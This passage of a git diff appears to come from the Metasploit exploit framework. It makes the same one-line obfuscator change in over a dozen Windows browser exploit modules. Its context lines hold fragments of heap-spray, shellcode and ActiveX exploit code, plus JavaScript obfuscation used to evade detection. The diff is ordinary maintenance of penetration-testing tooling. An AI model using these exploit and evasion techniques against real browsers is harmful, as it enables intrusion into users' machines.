(datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index cab570badc..f82559de4e 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote #Javascript obfuscation is optional if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf" diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index ab8329aab8..525c720023 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end return js diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb index da040e12fd..d4f30b1dae 100644 --- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb +++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb @@ -184,7 +184,7 @@ heapSpray(myoffset,myshellcode,myfillsled); if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end content = "" diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb index ec9ff0db78..bf43b215f2 100644 --- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb +++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb @@ -218,7 +218,7 @@ for (var i=0; i < 1600; i++) { #obfuscate on demand if datastore['OBFUSCATE'] js_spray = ::Rex::Exploitation::JSObfu.new(js_spray) - js_spray.obfuscate + js_spray.obfuscate(memory_sensitive: true) end else js_spray = <<-JS diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb index 19c103ab84..c5766be2e3 100644 --- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb +++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb @@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote #obfuscate on demand if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end html = <<-EOS diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 6f09ebd1d5..3302189b6e 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote } js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) - js.obfuscate() + js.obfuscate(memory_sensitive: true) content = %Q| diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index bb736f1946..50d942636a 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -100,7 +100,7 @@ vulnerable.OnBeforeVideoDownload(evil_string); } js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) - js.obfuscate() + js.obfuscate(memory_sensitive: true) # Generate the final HTML content = %Q| diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 8fe38efe5c..5cf4506565 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -118,7 +118,7 @@ window.location = "#{hcp_url}"; } } js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) - js.obfuscate() + js.obfuscate(memory_sensitive: true) =end js = encrypt_js(js, @javascript_encode_key) diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index 55b5c6df4c..4eab9ed5b0 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566"); x.url = "#{url}/#{dir}/"; | - js.obfuscate + js.obfuscate(memory_sensitive: true) html = "\n\t\n" print_status("Sending #{self.name}") send_response_html(cli, html) diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb index 5b35ecdef3..e971e292ec 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end end diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 199c27944b..7403874a11 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -398,7 +398,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end sploit = "http://" diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 58182c0a10..16fd7c4882 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote spray = heaplib(spray, {:noobfu => true}) spray = ::Rex::Exploitation::JSObfu.new(spray) - spray.obfuscate + spray.obfuscate(memory_sensitive: true) load = %Q| var d=document.getElementById("nsepadiv"); diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index 44636c8495..09ade0690c 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -161,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) - js.obfuscate + js.obfuscate(memory_sensitive: true) end return js diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 89936e7a39..5cd850b251 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote } js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) - js.obfuscate() + js.obfuscate(memory_sensitive: true) content = %Q|